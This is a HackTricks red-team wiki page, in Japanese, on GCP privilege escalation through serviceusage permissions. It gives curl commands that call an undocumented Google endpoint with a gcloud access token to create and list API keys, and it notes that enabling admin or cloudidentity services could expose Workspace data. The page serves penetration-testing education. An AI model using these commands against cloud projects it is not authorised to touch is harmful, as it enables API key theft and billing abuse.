GCP - Serviceusage Privesc

Reading time: 4 minutes

tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

serviceusage

次の権限はAPIキーを作成し、盗むのに役立ちます。ドキュメントからの注意点: APIキーは、プリンシパルなしでアプリケーションを識別するシンプルな暗号化された文字列です。これらは、公開データに匿名でアクセスするために便利であり、クォータ請求のためにAPIリクエストをプロジェクトに関連付けるために使用されます。

したがって、APIキーを使用すると、その会社にAPIの使用料を支払わせることができますが、権限を昇格させることはできません。

他の権限やAPIキーを生成する方法については、次を確認してください:

GCP - Apikeys Privesc

serviceusage.apiKeys.create

APIキーを作成するために使用できる文書化されていないAPIが見つかりました:

bash
curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

serviceusage.apiKeys.list

既に作成されたAPIキーをリストするための別の文書化されていないAPIが見つかりました(APIキーはレスポンスに表示されます):

bash
curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"

serviceusage.services.enable , serviceusage.services.use

これらの権限を持つ攻撃者は、プロジェクト内で新しいサービスを有効にし、使用することができます。これにより、攻撃者はadminやcloudidentityのようなサービスを有効にしてWorkspace情報にアクセスしようとしたり、興味深いデータにアクセスするための他のサービスを使用したりすることができます。

References

Support HackTricks and get benefits!

あなたはサイバーセキュリティ会社で働いていますか?あなたの会社をHackTricksで宣伝したいですか?それとも最新のPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたいですかSUBSCRIPTION PLANSをチェックしてください!

The PEASS Familyを発見してください。私たちの独占的なNFTsのコレクションです。

公式PEASS & HackTricksグッズを手に入れましょう。

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo****

.